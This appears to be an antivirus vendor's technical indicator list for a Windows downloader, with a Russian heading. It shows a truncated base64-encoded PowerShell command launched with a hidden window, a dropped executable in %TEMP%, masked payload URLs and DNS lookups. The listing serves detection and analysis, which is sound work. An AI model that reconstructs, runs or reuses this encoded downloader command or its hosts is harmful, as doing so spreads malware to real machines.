Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGsAaAByADUAZABwAD0AJwBaAHAAawByAG0AawBxACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAEMAYABVAGAAUgBpAGAAVABZAFAAYABSAE8AVABPAGMATwBsACIAIAA9AC...
- %TEMP%\ccbp.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\ccbp.exe
- http://ar###.com.br/img_b2w/jstgflap98/
- http://ko###er-pb.de/cgi-bin/HoDIPqV/
- http://ar###nmetal.com/_installation/LPMGMZroO/
- http://ye#####tonefitness.com/j5es7cx/QgLkys4ga64g228/
- DNS ASK ar###.com.br
- DNS ASK ko###er-pb.de
- DNS ASK ar###nmetal.com
- DNS ASK wi##igi.com
- DNS ASK ye#####tonefitness.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGsAaAByADUAZABwAD0AJwBaAHAAawByAG0AawBxACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAEMAYABVAGAAUgBpAGAAVABZAFAAYABSAE8AVABPAGMATwBsACIAIAA9AC...' (со скрытым окном)